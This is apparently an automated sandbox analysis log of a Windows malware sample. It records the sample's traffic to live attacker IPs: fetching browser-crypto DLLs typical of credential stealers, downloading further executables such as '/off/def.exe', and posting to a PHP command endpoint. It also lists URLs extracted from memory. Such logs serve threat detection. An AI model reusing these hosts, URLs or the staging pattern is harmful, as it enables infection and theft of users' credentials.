Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_0034E0C0 recv,recv,recv,recv, 9_2_0034E0C0
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RRmGy1p57v2AkWc&MD=pMuuV+bZ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RRmGy1p57v2AkWc&MD=pMuuV+bZ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 20:08:55 GMTIf-None-Match: "6733b5d7-1ba400"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: fleez-inc.sbs
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fleez-inc.sbs
Source: c3e1e78f6d.exe, 0000000D.00000002.2621813218.000000000152A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604516981.0000000001527000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000002.2621266837.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2728217584.0000000001001000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2743711813.0000000001010000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2728544166.000000000100A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2728824571.000000000100E000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3023444353.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3024056962.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: c3e1e78f6d.exe, 00000017.00000003.3023444353.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3024056962.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/F
Source: c3e1e78f6d.exe, 0000000D.00000002.2621813218.000000000152A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604516981.0000000001527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ld
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2164783980.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: c3e1e78f6d.exe, 0000000D.00000002.2622414625.0000000001568000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000002.2621813218.000000000152A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604516981.0000000001527000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604699653.0000000001567000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2728217584.0000000001001000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2743711813.0000000001024000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000001003000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2728544166.0000000001024000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3021521340.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3020786271.0000000000E83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: c3e1e78f6d.exe, 00000017.00000003.3021521340.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe5
Source: c3e1e78f6d.exe, 00000011.00000003.2728217584.0000000001001000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000001003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeFc
Source: c3e1e78f6d.exe, 0000000D.00000002.2621813218.000000000152A000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2604516981.0000000001527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/pd
Source: file.exe, 00000000.00000002.2164783980.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp, 82b4c5cad2.exe, 0000000E.00000002.2486797329.00000000017DE000.00000004.00000020.00020000.00000000.sdmp, 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2164783980.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllI~
Source: file.exe, 00000000.00000002.2164783980.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2164783980.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllP
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll=
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2164783980.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/9
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/;
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/T
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2186074735.0000000023162000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
Source: 82b4c5cad2.exe, 0000000E.00000002.2486797329.0000000001837000.00000004.00000020.00020000.00000000.sdmp, 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
Source: file.exe, 00000000.00000002.2186074735.0000000023173000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC:
Source: file.exe, 00000000.00000002.2186074735.0000000023173000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpb
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
Source: 82b4c5cad2.exe, 0000000E.00000002.2486797329.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/r
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ta
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000002.2160637336.00000000008B7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206Local
Source: file.exe, 00000000.00000002.2164783980.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Nq
Source: 82b4c5cad2.exe, 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206_
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: c3e1e78f6d.exe, 0000000D.00000003.2436187685.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2579390588.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2844798958.000000000557E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
